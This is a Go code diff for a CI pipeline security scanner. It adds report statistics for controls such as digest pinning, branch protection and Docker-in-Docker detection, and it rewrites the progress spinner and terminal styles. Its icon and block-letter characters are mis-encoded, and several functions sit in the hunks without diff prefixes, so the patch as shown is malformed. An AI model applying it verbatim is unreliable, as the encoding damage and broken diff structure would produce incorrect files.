+ case "containerImageMustNotUseForbiddenTags":
+ // Two distinct user intents share this control: forbid mutable
+ // tags, OR require a digest pin. The pin-by-digest variant
+ // counts how many images carry an OCI digest reference (any
+ // algorithm β sha256, sha512, β¦).
+ total := 0
+ pinned := 0
+ if result.PipelineImageData != nil {
+ total = len(result.PipelineImageData.Images)
+ for _, img := range result.PipelineImageData.Images {
+ if utils.HasDigestPin(img.Link) {
+ pinned++
+ }
+ }
+ }
+ notPinned := total - pinned
+ if notPinned < 0 {
+ notPinned = 0
+ }
+ usingForbidden := 0
+ for _, f := range findings {
+ if f.Code == string(control.CodeImageForbiddenTag) {
+ usingForbidden++
+ }
+ }
+ lines := []statLine{
+ {"Total Images", fmt.Sprintf("%d", total)},
+ }
+ if pc != nil && pc.Controls.ContainerImageMustNotUseForbiddenTags.IsPinnedByDigestRequired() {
+ lines = append(lines,
+ statLine{"Pinned By Digest", fmt.Sprintf("%d", pinned)},
+ statLine{"Not Pinned By Digest", fmt.Sprintf("%d", notPinned)},
+ )
+ }
+ lines = append(lines, statLine{"Using Forbidden Tags", fmt.Sprintf("%d", usingForbidden)})
+ return lines
+ case "containerImageMustComeFromAuthorizedSources":
+ total := 0
+ if result.PipelineImageMetrics != nil {
+ total = int(result.PipelineImageMetrics.Total)
+ }
+ unauthorized := findingsCount
+ authorized := total - unauthorized
+ if authorized < 0 {
+ authorized = 0
+ }
+ return []statLine{
+ {"Total Images", fmt.Sprintf("%d", total)},
+ {"Authorized", fmt.Sprintf("%d", authorized)},
+ {"Unauthorized", fmt.Sprintf("%d", unauthorized)},
+ }
+ case "pipelineMustNotIncludeHardcodedJobs":
+ total := uint(0)
+ hardcoded := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ total = result.PipelineOriginMetrics.JobTotal
+ hardcoded = result.PipelineOriginMetrics.JobHardcoded
+ }
+ return []statLine{
+ {"Total Jobs", fmt.Sprintf("%d", total)},
+ {"Hardcoded Jobs", fmt.Sprintf("%d", hardcoded)},
+ }
+ case "includesMustBeUpToDate":
+ // _externalIncludeCount strips the project's own pseudo-origin
+ // and the FromPlumber injection so "Total Includes" lines up
+ // with the count of *external* includes the v0.2.x analyzer
+ // reported.
+ total := _externalIncludeCount(result)
+ outdated := uint(0)
+ if result.PipelineOriginMetrics != nil {
+ outdated = result.PipelineOriginMetrics.OriginOutdated
+ }
+ return []statLine{
+ {"Total Includes", fmt.Sprintf("%d", total)},
+ {"Outdated", fmt.Sprintf("%d", outdated)},
+ }
+ case "includesMustNotUseForbiddenVersions":
+ total := _externalIncludeCount(result)
+ authorized := total - findingsCount
+ if authorized < 0 {
+ authorized = 0
+ }
+ return []statLine{
+ {"Total Includes", fmt.Sprintf("%d", total)},
+ {"Using Authorized Versions", fmt.Sprintf("%d", authorized)},
+ {"Using Forbidden Versions", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustNotEnableDebugTrace":
+ // "Variables Checked" mirrors v0.2.x: the total number of
+ // variable bindings the analyzer scanned across every job and
+ // the pipeline globals β not the size of the forbidden list.
+ // On a 27-job pipeline this lands around 50β60 because
+ // imported security templates each carry their own set.
+ return []statLine{
+ {"Variables Checked", fmt.Sprintf("%d", _countAllVariableBindings(result))},
+ {"Forbidden Found", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustNotOverrideJobVariables":
+ // Override checks only apply to bindings authored by the
+ // project (globals + hardcoded jobs); imported components
+ // legitimately set their own. Mirror that scope here so
+ // "Variables Checked" matches the count actually scanned.
+ return []statLine{
+ {"Variables Checked", fmt.Sprintf("%d", _countProjectAuthoredVariables(result))},
+ {"Overridden Found", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustNotUseUnsafeVariableExpansion":
+ return []statLine{
+ {"Jobs Checked", fmt.Sprintf("%d", jobTotal)},
+ {"Script Lines Checked", fmt.Sprintf("%d", _countScriptLines(result))},
+ {"Unsafe Expansions", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustNotExecuteUnverifiedScripts":
+ return []statLine{
+ {"Jobs Checked", fmt.Sprintf("%d", jobTotal)},
+ {"Script Lines Checked", fmt.Sprintf("%d", _countScriptLines(result))},
+ {"Unverified Scripts", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "securityJobsMustNotBeWeakened":
+ // Stable's "Security Jobs Found" counts how many of the merged
+ // jobs match a configured security pattern β a context-rich
+ // denominator for "0 weakened" findings: 0/14 reads very
+ // differently from 0/0.
+ return []statLine{
+ {"Security Jobs Found", fmt.Sprintf("%d", _countSecurityJobs(result, pc))},
+ {"Weakened Jobs", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "pipelineMustIncludeComponent":
+ var resolved [][]string
+ if pc != nil && pc.Controls.PipelineMustIncludeComponent != nil {
+ if g, err := pc.Controls.PipelineMustIncludeComponent.GetResolvedRequiredGroups(); err == nil {
+ resolved = g
+ }
+ }
+ satisfied := countSatisfiedGroups(resolved, result, "component")
+ return []statLine{
+ {"Requirement Groups", fmt.Sprintf("%d", len(resolved))},
+ {"Satisfied Groups", fmt.Sprintf("%d", satisfied)},
+ }
+ case "pipelineMustIncludeTemplate":
+ var resolved [][]string
+ if pc != nil && pc.Controls.PipelineMustIncludeTemplate != nil {
+ if g, err := pc.Controls.PipelineMustIncludeTemplate.GetResolvedRequiredGroups(); err == nil {
+ resolved = g
+ }
+ }
+ satisfied := countSatisfiedGroups(resolved, result, "template")
+ return []statLine{
+ {"Requirement Groups", fmt.Sprintf("%d", len(resolved))},
+ {"Satisfied Groups", fmt.Sprintf("%d", satisfied)},
+ }
+ case "pipelineMustNotUseDockerInDocker":
+ return []statLine{
+ {"Jobs Checked", fmt.Sprintf("%d", jobTotal)},
+ {"DinD Services Found", fmt.Sprintf("%d", _countDinDServices(result))},
+ {"Insecure Daemon Config", fmt.Sprintf("%d", findingsCount)},
+ }
+ case "branchMustBeProtected":
+ total, toProtect, protected, unprotected := _branchProtectionCounts(result, pc)
+ nonCompliant := 0
+ for _, f := range findings {
+ if f.Code == string(control.CodeBranchNonCompliant) {
+ nonCompliant++
+ }
+ }
+ return []statLine{
+ {"Total Branches", fmt.Sprintf("%d", total)},
+ {"Branches to Protect", fmt.Sprintf("%d", toProtect)},
+ {"Protected Branches", fmt.Sprintf("%d", protected)},
+ {"Unprotected", fmt.Sprintf("%d", unprotected)},
+ {"Non-Compliant", fmt.Sprintf("%d", nonCompliant)},
+ }
+ }
+ return nil
+}
+
+// _countScriptLines walks the merged GitLab CI conf and totals every
+// script line declared on every job (script, before_script,
+// after_script). Used as the "Script Lines Checked" denominator
+// printed under script-scanning controls. The merged conf may be
+// produced by either yaml.v2 (which yields `map[interface{}]any` for
+// nested maps) or yaml.v3 (`map[string]any`); accept both shapes.
+func _countScriptLines(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ total := 0
+ for _, raw := range result.PipelineImageData.MergedConf.GitlabJobs {
+ for _, key := range []string{"script", "before_script", "after_script"} {
+ switch v := _readMapKey(raw, key).(type) {
+ case string:
+ if v != "" {
+ total++
+ }
+ case []interface{}:
+ total += len(v)
+ }
+ }
+ }
+ return total
+}
+
+// _externalIncludeCount returns the number of external origins
+// (component / template / local / remote / project) excluding the
+// project itself, matching the v0.2.x "Total Includes" denominator.
+// Walks origin.Origins directly so we can skip both the FromPlumber
+// component (which Plumber injects implicitly when used) and the
+// project's own pseudo-origin even when OriginProject stays at 0 in
+// the metrics summary.
+func _externalIncludeCount(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineOriginData == nil {
+ return 0
+ }
+ count := 0
+ for i := range result.PipelineOriginData.Origins {
+ o := &result.PipelineOriginData.Origins[i]
+ if o.FromPlumber {
+ continue
+ }
+ // Skip the project's own root origin: the .gitlab-ci.yml is
+ // not an "include" in the user-facing sense. The origin type
+ // surfaces as either "project" or "hardcoded" depending on
+ // the collector path.
+ if o.OriginType == "" || o.OriginType == "project" || o.OriginType == "hardcoded" {
+ continue
+ }
+ count++
+ }
+ return count
+}
+
// _countProjectAuthoredVariables counts variable bindings the project
// owns: pipeline-level globals plus any job whose origin is the
// project's own .gitlab-ci.yml (per JobHardcodedMap). Imported
// component / template jobs are excluded — those bindings belong to
// upstream and the user cannot remove them.
//
// Returns 0 when the merged configuration is unavailable; returns
// only the global count when origin data is missing.
func _countProjectAuthoredVariables(result *control.AnalysisResult) int {
	if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
		return 0
	}
	total := 0
	// Pipeline-level globals are always project-authored.
	if g := result.PipelineImageData.MergedConf.GlobalVariables; g != nil {
		total += len(g)
	}
	// NOTE(review): this guard tests JobMap, but the loop below only
	// reads JobHardcodedMap — confirm that a non-nil JobMap really
	// implies JobHardcodedMap is populated, or guard on the map that
	// is actually used.
	if result.PipelineOriginData == nil || result.PipelineOriginData.JobMap == nil {
		return total
	}
	hardcoded := result.PipelineOriginData.JobHardcodedMap
	for name, raw := range result.PipelineImageData.MergedConf.GitlabJobs {
		// Only count jobs the user authors directly; imported
		// component / template variables fall outside this control's
		// scope (see ISSUE-205 rule guard).
		if hardcoded == nil || !hardcoded[name] {
			continue
		}
		// Accept both yaml.v2 and yaml.v3 map shapes for "variables".
		v := _readMapKey(raw, "variables")
		switch m := v.(type) {
		case map[string]interface{}:
			total += len(m)
		case map[interface{}]interface{}:
			total += len(m)
		}
	}
	return total
}
+
+// _countAllVariableBindings totals every distinct (job, variable)
+// binding the analyzer can see, plus pipeline-level globals. The
+// merged conf is the source of truth β it materialises variables
+// inherited from imported components/templates that the IR Job map
+// flattens away.
+func _countAllVariableBindings(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ total := 0
+ for _, raw := range result.PipelineImageData.MergedConf.GitlabJobs {
+ v := _readMapKey(raw, "variables")
+ switch m := v.(type) {
+ case map[string]interface{}:
+ total += len(m)
+ case map[interface{}]interface{}:
+ total += len(m)
+ }
+ }
+ if g := result.PipelineImageData.MergedConf.GlobalVariables; g != nil {
+ total += len(g)
+ }
+ return total
+}
+
+// _countSecurityJobs walks the merged conf and counts how many job
+// names match a configured security-job pattern. When the user has
+// not customised the patterns, fall back to the conventional GitLab
+// security-template suffixes (-sast, secret_detection, dependency-
+// scanning, container-scanning, license-scanning, dast).
+func _countSecurityJobs(result *control.AnalysisResult, pc *configuration.PlumberConfig) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ patterns := []string{}
+ if pc != nil && pc.Controls.SecurityJobsMustNotBeWeakened != nil {
+ patterns = pc.Controls.SecurityJobsMustNotBeWeakened.SecurityJobPatterns
+ }
+ if len(patterns) == 0 {
+ patterns = []string{
+ "*-sast", "*sast*", "secret_detection", "secret-detection",
+ "dependency_scanning", "dependency-scanning",
+ "container_scanning", "container-scanning",
+ "license_scanning", "license-scanning",
+ "dast", "*dast*",
+ }
+ }
+ count := 0
+ for name := range result.PipelineImageData.MergedConf.GitlabJobs {
+ if _matchesAnyGlob(name, patterns) {
+ count++
+ }
+ }
+ return count
+}
+
+// _matchesAnyGlob is a tiny wildcard matcher (only '*' is meaningful)
+// so we stay free of an external glob dependency in the renderer.
+func _matchesAnyGlob(name string, patterns []string) bool {
+ for _, p := range patterns {
+ if _globMatch(p, name) {
+ return true
+ }
+ }
+ return false
+}
+
// _globMatch reports whether name matches pattern, where '*' matches
// any (possibly empty) run of characters and every other character
// matches itself.
//
// The previous implementation scanned all fragments left-to-right
// with strings.Index and then required the scan position to land on
// len(name); because Index finds the FIRST occurrence, a pattern
// whose last fragment also occurs earlier in the name was wrongly
// rejected (e.g. "*-sast" vs "x-sast-sast", "*cd" vs "cdxcd"). The
// fix anchors the first fragment with HasPrefix, the last with
// HasSuffix, and only matches the middle fragments greedily.
func _globMatch(pattern, name string) bool {
	// No wildcard: plain equality.
	if !strings.Contains(pattern, "*") {
		return pattern == name
	}
	parts := strings.Split(pattern, "*") // len(parts) >= 2 here
	// The fragment before the first '*' must anchor at the start.
	if first := parts[0]; first != "" {
		if !strings.HasPrefix(name, first) {
			return false
		}
		name = name[len(first):]
	}
	// The fragment after the last '*' must anchor at the end.
	if last := parts[len(parts)-1]; last != "" {
		if !strings.HasSuffix(name, last) {
			return false
		}
		name = name[:len(name)-len(last)]
	}
	// Middle fragments match greedily, in order, within what remains.
	for _, part := range parts[1 : len(parts)-1] {
		if part == "" {
			continue
		}
		idx := strings.Index(name, part)
		if idx < 0 {
			return false
		}
		name = name[idx+len(part):]
	}
	return true
}
+
+// _branchProtectionCounts mirrors v0.2.x: walks every detected branch
+// against the user policy patterns and the upstream protection rules,
+// returning Total / ToProtect / Protected / Unprotected.
+func _branchProtectionCounts(result *control.AnalysisResult, pc *configuration.PlumberConfig) (total, toProtect, protected, unprotected int) {
+ if result == nil || result.ProtectionData == nil {
+ return 0, 0, 0, 0
+ }
+ branches := result.ProtectionData.Branches
+ total = len(branches)
+ if pc == nil || pc.Controls.BranchMustBeProtected == nil {
+ return total, 0, 0, 0
+ }
+ cfg := pc.Controls.BranchMustBeProtected
+ defaultBranch := result.DefaultBranch
+ patterns := cfg.NamePatterns
+ defaultProtected := cfg.DefaultMustBeProtected != nil && *cfg.DefaultMustBeProtected
+ // Branch protections in GitLab are patterns themselves (e.g.
+ // "main", "release/*"); a branch is "protected" iff at least one
+ // declared protection pattern matches its name.
+ protectionPatterns := make([]string, 0, len(result.ProtectionData.BranchProtections))
+ for _, p := range result.ProtectionData.BranchProtections {
+ protectionPatterns = append(protectionPatterns, p.ProtectionPattern)
+ }
+ for _, name := range branches {
+ matches := false
+ if defaultProtected && name == defaultBranch {
+ matches = true
+ }
+ if !matches && _matchesAnyGlob(name, patterns) {
+ matches = true
+ }
+ if matches {
+ toProtect++
+ if _matchesAnyGlob(name, protectionPatterns) {
+ protected++
+ } else {
+ unprotected++
+ }
+ }
+ }
+ return total, toProtect, protected, unprotected
+}
+
// _readMapKey reads `key` from a value that may be either a
// map[string]any (yaml.v3) or a map[interface{}]any (yaml.v2).
// Any other shape yields nil.
func _readMapKey(raw any, key string) any {
	if m, ok := raw.(map[string]interface{}); ok {
		return m[key]
	}
	if m, ok := raw.(map[interface{}]interface{}); ok {
		return m[key]
	}
	return nil
}
+
+// _countDinDServices counts jobs that wire a Docker-in-Docker
+// service (an entry under `services:` whose image string contains
+// "dind"). Walks the merged conf so we see services declared in
+// imported templates, not just the main job images. Mirrors the
+// legacy "DinD Services Found" stat.
+func _countDinDServices(result *control.AnalysisResult) int {
+ if result == nil || result.PipelineImageData == nil || result.PipelineImageData.MergedConf == nil {
+ return 0
+ }
+ count := 0
+ for _, raw := range result.PipelineImageData.MergedConf.GitlabJobs {
+ v := _readMapKey(raw, "services")
+ switch s := v.(type) {
+ case []interface{}:
+ for _, item := range s {
+ if _serviceLooksLikeDind(item) {
+ count++
+ break
+ }
+ }
+ case string:
+ if strings.Contains(s, "dind") {
+ count++
+ }
+ }
+ }
+ return count
+}
+
// _serviceLooksLikeDind decodes a single services list entry — a
// bare image string or a {name, alias, ...} map in either yaml map
// shape — and reports whether it references a Docker-in-Docker
// daemon image ("dind" substring in the image name).
func _serviceLooksLikeDind(item interface{}) bool {
	image := ""
	switch v := item.(type) {
	case string:
		image = v
	case map[string]interface{}:
		image, _ = v["name"].(string)
	case map[interface{}]interface{}:
		image, _ = v["name"].(string)
	}
	// A missing or non-string name leaves image empty, which can
	// never contain "dind".
	return strings.Contains(image, "dind")
}
+
+// countSatisfiedGroups returns how many DNF requirement groups have
+// every required component (or template) actually present in the
+// pipeline. Mirrors the rego matching rules in component_missing /
+// template_missing: an origin matches when its cleaned location, the
+// raw location, or any Plumber-augmented path equals the required
+// entry. The kindFilter is "component" for ISSUE-408 and "template"
+// for ISSUE-405 (anything that is not "component" or "hardcoded").
+func countSatisfiedGroups(groups [][]string, result *control.AnalysisResult, kindFilter string) int {
+ if result == nil || result.PipelineOriginData == nil || len(groups) == 0 {
+ return 0
+ }
+ satisfied := 0
+ for _, group := range groups {
+ if len(group) == 0 {
+ continue
+ }
+ all := true
+ for _, required := range group {
+ if !originGroupMatch(required, result.PipelineOriginData, kindFilter) {
+ all = false
+ break
+ }
+ }
+ if all {
+ satisfied++
+ }
+ }
+ return satisfied
+}
+
+func originGroupMatch(required string, data *collector.GitlabPipelineOriginData, kindFilter string) bool {
+ cleanRequired := utils.CleanOriginPath(required)
+ for i := range data.Origins {
+ o := &data.Origins[i]
+ if !originKindMatches(o.OriginType, kindFilter) {
+ continue
+ }
+ loc := o.GitlabIncludeOrigin.Location
+ if loc == required || utils.CleanOriginPath(loc) == cleanRequired {
+ return true
+ }
+ if o.PlumberOrigin.Path != "" && o.PlumberOrigin.Path == required {
+ return true
+ }
+ }
+ return false
+}
+
// originKindMatches reports whether an origin type satisfies the
// requested kind filter: "component" requires exactly a component
// origin, while "template" accepts any non-empty origin type other
// than "component" and "hardcoded". Unknown filters match nothing.
func originKindMatches(originType, kindFilter string) bool {
	if kindFilter == "component" {
		return originType == "component"
	}
	if kindFilter != "template" {
		return false
	}
	switch originType {
	case "", "component", "hardcoded":
		return false
	}
	return true
}
+
+// findingGroupsFromRegoFindings converts the Rego engine's flat
+// findings list into groups keyed by ControlName (from the issue-code
+// registry). Used by the GitHub analyze path; will also be used by
+// the GitLab path once all legacy Go controls have been ported.
+func findingGroupsFromRegoFindings(findings []opaengine.Finding) []findingGroup {
+ type bucket struct {
+ title string
+ items []detailedFinding
+ }
+ byControl := map[string]*bucket{}
+ order := []string{}
+
+ for _, f := range findings {
+ info := control.LookupCode(control.ErrorCode(f.Code))
+ key := f.Code
+ title := f.Code
+ docURL := ""
+ if info != nil {
+ if info.ControlName != "" {
+ key = info.ControlName
+ }
+ if info.Title != "" {
+ title = info.Title
+ }
+ docURL = info.DocURL
+ }
+ b, ok := byControl[key]
+ if !ok {
+ b = &bucket{title: title}
+ byControl[key] = b
+ order = append(order, key)
+ }
+ b.items = append(b.items, detailedFinding{
+ Code: control.ErrorCode(f.Code),
+ Message: f.Message,
+ DocURL: docURL,
+ Location: formatFindingLocation(f),
+ DetailLines: detailLinesFromFinding(f),
+ })
+ }
+ sort.Strings(order)
+
+ out := make([]findingGroup, 0, len(order))
+ for _, key := range order {
+ b := byControl[key]
+ out = append(out, findingGroup{
+ Title: b.title,
+ Compliance: 0,
+ Skipped: false,
+ Stats: []statLine{{Label: "Total Findings", Value: fmt.Sprintf("%d", len(b.items))}},
+ Findings: b.items,
+ })
+ }
+ return out
+}
diff --git a/cmd/spinner.go b/cmd/spinner.go
index 698ffdd..51882d2 100644
--- a/cmd/spinner.go
+++ b/cmd/spinner.go
@@ -4,146 +4,134 @@ import (
"fmt"
"os"
"sync"
- "time"
+ "unicode/utf8"
+ "github.com/schollz/progressbar/v3"
"github.com/sirupsen/logrus"
)
-// progressSpinner displays a progress indicator on stderr during long-running operations.
-// It shows an animated spinner with the current step message and a progress bar.
+// spinnerMessageWidth is the fixed cell width the Describe label
+// occupies. The bar + percent + count + elapsed/ETA add roughly
+// another 45 cells; the total line lands around 100 columns, which
+// is a comfortable fit for modern terminals. Keeping the label at
+// a fixed width avoids redraw artefacts when a new message is
+// shorter than the previous one (progressbar/v3 renders with `\r`
+// and does not clear trailing glyphs).
+const spinnerMessageWidth = 52
+
+// progressSpinner wraps schollz/progressbar/v3 to give the analyze
+// command a modern, thick-block progress bar driven by the same
+// Update(step, total, message) interface the legacy hand-rolled
+// spinner exposed. Only the visual rendering changes β no change to
+// orchestration or log plumbing is needed upstream.
type progressSpinner struct {
- mu sync.Mutex
- step int
- total int
- message string
- done chan struct{}
- stopped chan struct{}
- started bool
+ mu sync.Mutex
+ bar *progressbar.ProgressBar
}
-// newSpinner creates a new progressSpinner. Call Start() to begin animation.
+// newSpinner returns an uninitialised progressSpinner. The underlying
+// progress bar is created lazily on the first Update call, at which
+// point the total step count is known.
func newSpinner() *progressSpinner {
- return &progressSpinner{
- done: make(chan struct{}),
- stopped: make(chan struct{}),
- }
+ return &progressSpinner{}
}
-// spinnerFrames are the spinner animation characters
-var spinnerFrames = []string{"β ", "β ", "β Ή", "β Έ", "β Ό", "β ΄", "β ¦", "β §", "β ", "β "}
// Start is a no-op kept for interface compatibility with the legacy
// spinner: progressbar/v3 renders itself on every Set/Describe call,
// so there is no background animation goroutine to launch here.
func (s *progressSpinner) Start() {}
-// Update sets the current progress step and message.
-// This is safe to call from any goroutine.
-func (s *progressSpinner) Update(step, total int, message string) {
+// Stop finalises the progress bar and clears the line so the
+// post-analysis output starts on a clean row.
+func (s *progressSpinner) Stop() {
s.mu.Lock()
defer s.mu.Unlock()
- s.step = step
- s.total = total
- s.message = message
-}
-
-// ClearLine erases the spinner line so log output can print cleanly.
-func (s *progressSpinner) ClearLine() {
- if s.started {
- fmt.Fprintf(os.Stderr, "\r\033[K")
+ if s.bar == nil {
+ return
}
+ _ = s.bar.Finish()
+ fmt.Fprint(os.Stderr, "\r\033[K")
}
-// spinnerLogHook is a logrus hook that clears the spinner line before each log entry.
-type spinnerLogHook struct {
- spinner *progressSpinner
// Update sets the progress to step/total and updates the label. It is
// safe to call concurrently: the mutex serialises bar construction
// and every Describe/Set pair.
func (s *progressSpinner) Update(step, total int, message string) {
	s.mu.Lock()
	defer s.mu.Unlock()
	// Lazy construction: the total step count is only known at the
	// first Update call.
	// NOTE(review): the bar is sized from the first call's `total`;
	// later calls passing a different total will not resize it —
	// confirm callers keep total constant across a run.
	if s.bar == nil {
		s.bar = progressbar.NewOptions(total,
			progressbar.OptionSetWriter(os.Stderr),
			progressbar.OptionShowCount(),
			progressbar.OptionSetWidth(20),
			progressbar.OptionSetTheme(progressbar.Theme{
				Saucer:        "β",
				SaucerHead:    "β",
				SaucerPadding: "β",
				BarStart:      "",
				BarEnd:        "",
			}),
			progressbar.OptionSetRenderBlankState(true),
			progressbar.OptionClearOnFinish(),
		)
	}
	// Fixed-width label: progressbar redraws with \r and does not
	// clear trailing glyphs, so a shorter message after a longer one
	// would otherwise leave artefacts (see spinnerMessageWidth).
	s.bar.Describe(fmt.Sprintf(" %s", padOrTruncate(message, spinnerMessageWidth)))
	_ = s.bar.Set(step)
}
-func (h *spinnerLogHook) Levels() []logrus.Level {
- return logrus.AllLevels
// padOrTruncate returns message adjusted to exactly width runes:
// shorter messages are right-padded with spaces, longer ones are
// truncated with a trailing ellipsis so the most informative prefix
// (`Resolving action /…`) stays visible and the spinner line keeps a
// stable width. width <= 0 yields "".
//
// Truncation — including the width==1 edge case — operates on runes,
// never bytes: the previous implementation byte-sliced the message
// at width 1 and could split a multi-byte UTF-8 rune, emitting an
// invalid byte sequence to the terminal.
func padOrTruncate(message string, width int) string {
	if width <= 0 {
		return ""
	}
	n := utf8.RuneCountInString(message)
	if n == width {
		return message
	}
	if n < width {
		// Right-pad with ASCII spaces up to the requested width.
		pad := make([]byte, width-n)
		for i := range pad {
			pad[i] = ' '
		}
		return message + string(pad)
	}
	runes := []rune(message)
	if width == 1 {
		// No room for an ellipsis: keep the first whole rune.
		return string(runes[:1])
	}
	return string(runes[:width-1]) + "β¦"
}
-func (h *spinnerLogHook) Fire(_ *logrus.Entry) error {
- h.spinner.ClearLine()
- return nil
// padding returns a string of n ASCII spaces; n <= 0 yields "".
func padding(n int) string {
	if n <= 0 {
		return ""
	}
	spaces := make([]byte, n)
	for i := 0; i < n; i++ {
		spaces[i] = ' '
	}
	return string(spaces)
}
-// InstallLogHook adds a logrus hook that clears the spinner line before each log message.
-// This prevents log output from being interleaved with the spinner animation.
+// InstallLogHook registers a logrus hook that blanks the current line
+// before a log record is emitted. Without it the progress bar and the
+// log message would fight for the same terminal row and both would
+// end up garbled.
func (s *progressSpinner) InstallLogHook() {
- logrus.AddHook(&spinnerLogHook{spinner: s})
+ logrus.AddHook(&spinnerLogHook{s: s})
}
-// Start begins the spinner animation in a background goroutine.
-// The spinner renders to stderr so it doesn't interfere with stdout output.
-func (s *progressSpinner) Start() {
- s.started = true
- go func() {
- defer close(s.stopped)
- ticker := time.NewTicker(80 * time.Millisecond)
- defer ticker.Stop()
- frameIdx := 0
-
- for {
- select {
- case <-s.done:
- // Render final completion state before clearing
- s.mu.Lock()
- step := s.step
- total := s.total
- msg := s.message
- s.mu.Unlock()
-
- if total > 0 {
- bar := ""
- for i := 0; i < 20; i++ {
- bar += "β"
- }
- fmt.Fprintf(os.Stderr, "\r\033[K β [%s] (%d/%d) %s\n", bar, step, total, msg)
- } else {
- fmt.Fprintf(os.Stderr, "\r\033[K")
- }
- return
- case <-ticker.C:
- s.mu.Lock()
- step := s.step
- total := s.total
- msg := s.message
- s.mu.Unlock()
-
- if total == 0 {
- continue
- }
-
- frame := spinnerFrames[frameIdx%len(spinnerFrames)]
- frameIdx++
-
- // Build progress bar
- barWidth := 20
- filled := 0
- if total > 0 {
- filled = (step * barWidth) / total
- }
- if filled > barWidth {
- filled = barWidth
- }
-
- bar := ""
- for i := 0; i < barWidth; i++ {
- if i < filled {
- bar += "β"
- } else {
- bar += "β"
- }
- }
// spinnerLogHook is a logrus hook owned by a progressSpinner. Its
// Fire implementation blanks the current terminal row before each
// log entry so log lines and the progress bar do not interleave on
// the same row.
type spinnerLogHook struct {
	s *progressSpinner // spinner whose mutex guards the stderr row
}
- // Render: β [ββββββββββββββββββββ] (3/14) Collecting pipeline origins
- line := fmt.Sprintf("\r\033[K %s [%s] (%d/%d) %s", frame, bar, step, total, msg)
- fmt.Fprint(os.Stderr, line)
- }
- }
- }()
+func (h *spinnerLogHook) Levels() []logrus.Level {
+ return logrus.AllLevels
}
-// Stop terminates the spinner animation and waits for cleanup.
-func (s *progressSpinner) Stop() {
- if s.started {
- close(s.done)
- <-s.stopped // wait for the goroutine to finish rendering
- }
+func (h *spinnerLogHook) Fire(_ *logrus.Entry) error {
+ h.s.mu.Lock()
+ defer h.s.mu.Unlock()
+ fmt.Fprint(os.Stderr, "\r\033[K")
+ return nil
}
diff --git a/cmd/styles.go b/cmd/styles.go
new file mode 100644
index 0000000..7c584a8
--- /dev/null
+++ b/cmd/styles.go
@@ -0,0 +1,149 @@
+package cmd
+
+import "github.com/charmbracelet/lipgloss"
+
// Palette inspired by modern terminal renderers (trivy / semgrep /
// osc-policy style). Consistent hex colors, readable on dark and
// light backgrounds alike. The semantic styles (title, muted, …)
// compose these colors so call sites stay stable if the palette
// evolves.

// Palette
var (
	colCritical = lipgloss.Color("#FF4D4F")
	colHigh     = lipgloss.Color("#FF8C42")
	colMedium   = lipgloss.Color("#F2C744")
	colLow      = lipgloss.Color("#4FACF7")
	colPass     = lipgloss.Color("#5BC976")
	colAccent   = lipgloss.Color("#5CCDEF")
	colMuted    = lipgloss.Color("#6C7280")
	colBody     = lipgloss.Color("#D5D8DC")
)
+
// Semantic styles — prefer these over raw colors to keep call sites
// readable. Each one composes a palette color (above) with weight /
// padding, so a palette change propagates everywhere automatically.
var (
	styleTitle   = lipgloss.NewStyle().Foreground(colBody).Bold(true)
	styleAccent  = lipgloss.NewStyle().Foreground(colAccent)
	styleMuted   = lipgloss.NewStyle().Foreground(colMuted)
	styleDim     = lipgloss.NewStyle().Faint(true)
	styleError   = lipgloss.NewStyle().Foreground(colCritical)
	styleSuccess = lipgloss.NewStyle().Foreground(colPass)
	styleCell    = lipgloss.NewStyle().Padding(0, 1)
	styleHeader  = lipgloss.NewStyle().Foreground(colBody).Bold(true).Padding(0, 1)
	styleRule    = lipgloss.NewStyle().Foreground(colMuted)
	styleFail    = lipgloss.NewStyle().Foreground(colCritical).Bold(true)
)

// hrWidth controls the width (in cells) of the horizontal separator
// used by section dividers (score banner, etc.).
const hrWidth = 78
+
+// severityColor returns the palette color associated with a severity
+// label.
+func severityColor(sev string) lipgloss.Color {
+ switch sev {
+ case "critical":
+ return colCritical
+ case "high":
+ return colHigh
+ case "medium":
+ return colMedium
+ case "low":
+ return colLow
+ }
+ return colMuted
+}
+
// severityIcon returns the emoji icon for a severity label;
// unrecognised labels fall back to the neutral white circle.
func severityIcon(sev string) string {
	switch sev {
	case "critical":
		return "π΄"
	case "high":
		return "π "
	case "medium":
		return "π‘"
	case "low":
		return "π΅"
	default:
		return "βͺ"
	}
}
+
+// scoreLetterLipglossColor maps a Plumber letter grade (AβE) to the
+// palette color used across score banners.
+func scoreLetterLipglossColor(letter string) lipgloss.Color {
+ switch letter {
+ case "A", "B":
+ return colPass
+ case "C":
+ return colMedium
+ case "D":
+ return colHigh
+ }
+ return colCritical
+}
+
// Block-letter ASCII art for Plumber letter grades (A-E). Each entry
// is 6 lines tall / 8 columns wide, matching the project's existing
// banner lettering style. "E" doubles as the fallback badge for
// unknown grades (see scoreLetterAsciiArt).
var scoreLetterAscii = map[string][]string{
	"A": {
		" ββββββ ",
		"ββββββββ",
		"ββββββββ",
		"ββββββββ",
		"βββ βββ",
		"βββ βββ",
	},
	"B": {
		"βββββββ ",
		"ββββββββ",
		"ββββββββ",
		"ββββββββ",
		"ββββββββ",
		"βββββββ ",
	},
	"C": {
		" βββββββ",
		"ββββββββ",
		"βββ ",
		"βββ ",
		"ββββββββ",
		" βββββββ",
	},
	"D": {
		"βββββββ ",
		"ββββββββ",
		"βββ βββ",
		"βββ βββ",
		"ββββββββ",
		"βββββββ ",
	},
	"E": {
		"ββββββββ",
		"ββββββββ",
		"ββββββ ",
		"ββββββ ",
		"ββββββββ",
		"ββββββββ",
	},
}
+
+// scoreLetterAsciiArt returns the block-letter art for the given
+// grade, ready-rendered with its tier color. Unknown letters fall
+// back to the E badge.
+func scoreLetterAsciiArt(letter string) string {
